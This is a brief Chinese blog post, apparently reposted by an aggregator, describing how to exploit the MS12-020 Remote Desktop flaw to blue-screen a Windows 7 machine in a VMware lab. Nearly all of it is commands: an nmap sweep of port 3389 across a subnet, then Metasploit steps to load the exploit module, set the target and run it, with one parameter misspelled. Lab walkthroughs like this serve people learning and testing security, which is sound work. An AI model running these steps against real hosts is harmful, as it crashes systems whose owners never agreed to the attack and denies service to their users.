MS12-020漏洞的利用(死亡蓝屏)

Posted 白帽小学二年级

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了MS12-020漏洞的利用(死亡蓝屏)相关的知识,希望对你有一定的参考价值。

攻击方:kali-Linux

目标机:Windows7 专业版

平台:VMware虚拟机

在window7上打开远程服务(端口3389)

 nmap 192.168.48.0/24 -p 3389   //在kali上扫描同一网段下所有主机的3389端口打开情况

发现只有192.168.48.129的3389端口打开,显然是window7的ip地址,确认攻击目标

msfconsole //启动msfconsole工具

search ms12-020 //查看ms12-020漏洞利用的攻击模块

use 0 //使用攻击模块,另一个为检测模块(检测对方是否存在漏洞,用法相同)

show options //显示配置参数

set rhonsts ip地址 //设置攻击目标的ip地址

show options //再次查看配置参数

run //运行,到win7查看成功使其蓝屏

 

 

 

以上是关于MS12-020漏洞的利用(死亡蓝屏)的主要内容,如果未能解决你的问题,请参考以下文章

MS12-020漏洞复现及自动化批量利用

ms12-020复现-xp蓝屏

MS12-020漏洞利用

CVE-2012-0002(MS12-020)3389远程溢出漏洞

内网提权-系统篇

微软紧急叫停!Win11年度大更新变“年度大翻车”:死亡蓝屏帧率暴跌性能缩水...